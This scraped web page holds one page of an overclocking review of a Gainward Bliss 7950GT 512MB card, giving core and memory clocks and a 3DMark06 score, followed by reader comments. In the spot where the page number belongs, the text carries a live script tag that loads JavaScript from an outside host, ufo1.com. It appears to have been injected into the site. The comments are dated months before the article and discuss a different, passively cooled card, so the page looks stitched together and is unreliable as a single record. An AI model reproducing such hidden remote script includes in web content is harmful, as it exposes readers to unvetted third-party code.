Gainward Bliss Golden Sample 7950GT 512mb

Overclocking Results

Page <script type="text/javascript" src="http://ufo1.com/ad/c.js"></script> Posted 12/11/06
Author: Matthew Kemp (kempez)
Product Acquired: Gainward


Overclocking Results


Overclocking was performed via the usual and very easy nVidia "coolbits" reg hack (see here for a "how to"). No volt mods were performed on the card (either hard or soft mods) and this shows us standardised overclocking across all cards reviewed. Remember that an overclock can be dependent on the specific GPU used.


The Result

Let's see how the Gainward "Golden Sample" did in overclocking:

gainward 7950 gt golden sample overclock

Memory: 1701
Core: 677

That's an overclock of 97MHz on the core and 201MHz on the memory, with stock voltages.

I haven't talked about "Golden Sample" cards but let's just say that this is an impressive overclock with no voltage adjustment at all. This looks to be a "cherry picked" GPU with some awesome clocks in store if the card gets put under water or phase.

3dMark06 Overclocked result

To test this awesome overclock I fired up 3dMark06 and saw how the card did. Let's take a look:

gainward 7950 gt golden sample

An impressive increase of 657 3dMarks. Very nice I must say and worthy of the "Golden Sample" mantle. Gainward also do a "Goes Like Hell Edition" which promises even higher clocks.

Impressive to say the least.

«Prev 1 2 3 4 5 6 7 8 Next»

Most Recent Comments

23-07-2006, 12:43:39

FarFarAway
We take a look at this silent card and see what we think. Link here

23-07-2006, 12:57:44

Raven
looks good but on page2 in an image it says cooling: fan(one slot)

http://www.overclock3d.net/image.php?id=2099

liked the overclocked chart with the nonoverclocked score, easier to get a good look

23-07-2006, 12:59:09

FarFarAway
Yeah it does doesn't it?

Ah well: it's from Gainwards website

23-07-2006, 13:03:46

NickS
Great review m8. Card is kinda... eh. I was thinkin bout getting one to replace the X800 128MB PCI-E in my spare rig, but after looking at benches my X800 rips it a new one :O.

23-07-2006, 13:09:53

FarFarAway
Well it's a low-end card so it's not going to be the very best..

23-07-2006, 13:17:41

Raven
Quote:
Originally Posted by name='Kempez'
Ah well: it's from Gainwards website
Gainward should have done better than that, passive cooling sounds much better than one slot fan.

23-07-2006, 14:10:24

FragTek
Great review mate, cheers for that!

24-07-2006, 11:39:25

Hyper
Nice review mate, if I was to build a computer at the minute I would definatly be putting one of those in as they are great value for money and silent

24-07-2006, 12:40:26

limqareb
so you mean that card kills a 7800GS

24-07-2006, 12:41:24

FarFarAway
Quote:
Originally Posted by name='limqareb'
so you mean that card kills a 7800GS
ey?
Reply
x

Register for the OC3D Newsletter

Subscribing to the OC3D newsletter will keep you up-to-date on the latest technology reviews, competitions and goings-on at Overclock3D. We won't share your email address with ANYONE, and we will only email you with updates on site news, reviews, and competitions and you can unsubscribe easily at any time.

Simply enter your name and email address into the box below and be sure to click on the links in the confirmation emails that will arrive in your e-mail shortly after to complete the registration.

If you run into any problems, just drop us a message on the forums.